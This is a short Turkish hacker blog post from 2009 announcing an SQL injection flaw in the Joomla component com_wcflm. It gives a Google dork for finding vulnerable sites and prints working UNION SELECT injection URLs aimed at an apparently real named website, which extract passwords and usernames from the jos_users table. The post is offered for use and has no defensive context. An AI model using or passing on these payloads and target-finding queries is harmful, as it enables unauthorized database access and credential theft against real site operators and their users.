25 Aralık 2009 Cuma

JOOMLA com_wcflm SQL injection

Acıgı Bulan : ByEge
Acık Türü : SQL İNJECTİON..
Site : h4ckz.com
Blog : byege.blogspot.com

google dork : inurl:com_wcflm

http:/localhost/index.php?option=com_wcflm&task=showList&flmlist_id=2&id= inj code..

http://wannadive.net/community/index.php?option=com_wcflm&task=showList&flmlist_id=2&id=-6306 UNION SELECT password from jos_users--

http://wannadive.net/community/index.php?option=com_wcflm&task=showList&flmlist_id=2&id=-6306 UNION SELECT username from jos_users--

Hiç yorum yok :

Yorum Gönderme